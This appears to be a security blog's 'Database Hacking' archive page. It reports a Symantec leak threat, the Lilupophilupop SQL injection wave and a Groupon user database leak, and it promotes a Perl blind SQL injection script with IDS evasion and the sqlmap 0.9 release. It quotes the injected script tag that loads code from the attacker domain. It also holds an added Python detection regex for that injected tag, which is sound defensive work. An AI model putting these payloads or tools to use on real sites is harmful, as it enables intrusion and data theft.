Category: Database Hacking

Jan 05 2012

Hackers Threaten to Post Source Code for Symantec Product

Hackers have posted a file online that they claim is a confidential glimpse into Symantec’s Norton Antivirus program and have threatened to release source code for the security giant’s flagship antivirus product.

The hacker group, which calls itself the Lords of Dharmaraja, posted a file on Pastebin that it said described the confidential workings of Symantec’s Norton Antivirus threat-detection product. The documentation, and any source code, could be exploited by hackers to corrupt the antivirus program or write malicious code that circumvents Norton’s product altogether. The original post is no longer on Pastebin, although there is a Google cache.

The hackers claim to have discovered Symantec’s source code in a hack they conducted on India’s military and intelligence servers. In their online post, the hackers said, “We have discovered within the Indian Spy Program source codes of a dozen software companies,” which the hackers said had signed agreements with an Indian defense program and India’s Central Bureau of Investigation.

In an e-mail, a Symantec spokesman, Cris Paden, said the hackers’ post was an outdated document from 1999 that “explains how the software is designed to work (what inputs are accepted and what outputs are generated) and contains function names, but there is no actual source code present.”

The hacker group threatened to release the actual source code for the Norton AntiVirus software later on. “We are working out mirrors as of now,” the hackers wrote in their post.

Mr. Paden said Symantec was “currently investigating that.”

Symantec’s Norton brand antivirus products make up the bulk of its sales to consumers, which totaled nearly $2 billion last year — a third of Symantec’s revenue. If any part of its source code was exploited or tampered with, it could hurt Symantec’s share price and bottom line.

“If this document is from 1999, chances are the source code has changed a fair bit,” said Robert Rachwald, director of security strategy at Imperva, an Internet security company. “But if Symantec hasn’t done any major overhauls, there may be some parts of the code that remain intact,” he said, and someone could find a way to poke holes in it.

Jan 03 2012

Fully Automated MySQL 5 Boolean Enumeration Script

This script uses blind SQL injection and boolean enumeration to perform INFORMATION_SCHEMA Mapping.

Syntax:

perl mysql5enum.pl -h [hostname] -u [url] [-q [query]]

Example:

perl mysql5enum.pl -h www.target.tld -u http://www.target.tld/vuln.ext?input=24 -q "select system_user()"

Description:
– By default, this script will first determine username, version and database name before enumerating the information_schema information.
– When the -q flag is applied, a user can supply any query that returns only a single cell.
– If the exploit or vulnerability requires a single quote, simply tack %27 to the end of the URI.
– This script contains error detection: It will only work on a mysql 5.x database, and knows when its queries have syntax errors.
– This script uses perl’s LibWhisker2 for IDS Evasion (The same as Nikto).
– This script uses the MD5 algorithm for optimization. There are other optimization methods, and this may not work on all sites.

Download: mysql5enum.pl.zip

Jan 01 2012

Lilupophilupop SQL Injection Tops 1 Million Infected Pages

A SQL injection attack uncovered by the ISC (Internet Storm Center) is spreading at an extremely fast rate: the number of infected pages has risen from just a few hundred to over 1 million in just a few weeks.

Over the past few weeks of going through submitted results and information from Internet users, they have put together some interesting data. The attack appears to target Windows-based servers, and the logs show that the attackers had been probing around in the weeks before the sites were injected with a special string:

"></title><script src="hXXp://lilupophilupop.com/sl.php"></script>

They have also put together a fairly solid base of statistics on which ccTLDs have been infected (shown below):

  • UK – 56,300
  • NL – 123,000
  • DE – 49,700
  • FR – 68,100
  • DK – 31,000
  • CN – 505
  • CA – 16,600
  • COM – 30,500
  • RU – 32,000
  • JP – 23,200
  • ORG – 2,690

At the moment it looks like the attack is partially automated and partially manual. The manual component and the number of sites infected suggest either a reasonably sized workforce or a long preparation period.

If you want to find out whether you have a problem, search for "<script src="http://lilupophilupop.com/" in Google and use the site: parameter to home in on your domain.
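Beyond the Google search, a site owner can scan a database export directly for the injected string. The following is an added example (not from the ISC diary or this post): a Python scanner that runs over constructed rows of a content table, catching both the defanged (hXXp) and live (http) form of the URL and flagging whether the `"></title>` tag-breakout prefix was present. The row format and the helper name are assumptions.

```python
import re

# Signature of the injection described above: an optional tag-breakout prefix
# ('"></title>') followed by a script tag loading sl.php from the attacker domain.
# Matches the defanged (hXXp) and live (http) forms and either quote style.
SIGNATURE = re.compile(
    r'(?P<breakout>"?>\s*</title>)?\s*'
    r'<script\s+src=["\']?(?P<url>h(?:tt|XX)p://lilupophilupop\.com/[^"\'>\s]*)["\']?>'
    r'\s*</script>',
    re.IGNORECASE,
)


def find_injections(rows):
    """Scan (row_id, column, value) triples, e.g. from a DB export, and return
    a list of (row_id, column, url, broke_out_of_title) hits."""
    hits = []
    for row_id, column, value in rows:
        if not isinstance(value, str):
            continue  # numeric / NULL columns cannot carry the payload
        for m in SIGNATURE.finditer(value):
            hits.append((row_id, column, m.group("url"), m.group("breakout") is not None))
    return hits


# Constructed sample rows standing in for a dump of a CMS content table.
SAMPLE_ROWS = [
    (1, "title", 'Welcome to our shop"></title><script src="hXXp://lilupophilupop.com/sl.php"></script>'),
    (2, "body", "Nothing to see here"),
    (3, "body", "Plain text <script src='http://lilupophilupop.com/sl.php'></script>"),
    (4, "title", '<script src="http://example.com/app.js"></script>'),  # legitimate script, no hit
]

if __name__ == "__main__":
    for hit in find_injections(SAMPLE_ROWS):
        print("row %s column %s: %s (title breakout: %s)" % hit)
```

Run it against the rows of every text column in a dump; rows 1 and 3 above are reported, row 4 (a script from another domain) is not.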

Original Findings and Comments: ISC Diary | SQL Injection Attack happening ATM

Jun 28 2011

Groupon Leaks Entire Indian User Database

The entire user database of Groupon’s Indian subsidiary Sosasta.com was accidentally published to the Internet and indexed by Google.

The database includes the e-mail addresses and clear-text passwords of the site’s 300,000 users. It was discovered by Australian security consultant Daniel Grzelak as he searched for publicly accessible databases containing e-mail address and password pairs.

Grzelak used Google to search for SQL database files that were web accessible and contained keywords like “password” and “gmail”.

“A few hours and tweaks later, this database came up,” he said. “I started scrolling, and scrolling and I couldn’t get to the bottom of the file. Then I realised how big it actually was.”

Grzelak contacted Risky.Biz after the Sosasta discovery to seek advice on disclosure. This website contacted the CEO of Groupon, Andrew Mason, who called back personally within 24 hours of initial contact.

The database was removed immediately and the company has launched an internal investigation to find out how it wound up publicly accessible in the first place.

Groupon is notifying all its Sosasta users of the incident and is advising them that the passwords they used on the website are now compromised and cannot be relied upon to secure other accounts.

Source: Risky.Biz

Apr 12 2011

sqlmap 0.9 Released – SQL Injection Tool

After a year of hardcore development, sqlmap 0.9 is out!

Introduction:
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a kick-ass detection engine, many niche features for the ultimate penetration tester and a broad range of switches, ranging from database fingerprinting, over fetching data from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

New Features:

  • Rewritten SQL injection detection engine
  • Support to directly connect to the database without passing via a SQL injection, -d switch
  • Added full support for both time-based blind SQL injection and error-based SQL injection techniques
  • Implemented support for SQLite 2 and 3
  • Implemented support for Firebird
  • Implemented support for Microsoft Access, Sybase and SAP MaxDB
  • Added support to tamper injection data with the --tamper switch
  • Added automatic recognition of password hashes format and support to crack them with a dictionary-based attack
  • Added support to fetch unicode data
  • Added support to use persistent HTTP(s) connections for a speed improvement, --keep-alive switch
  • Implemented several optimization switches to speed up the exploitation of SQL injections
  • Support to parse and test forms on the target URL, --forms switch
  • Added switches to brute-force table names and column names with a dictionary attack, --common-tables and --common-columns

Download: sqlmap-0.9.tar.gz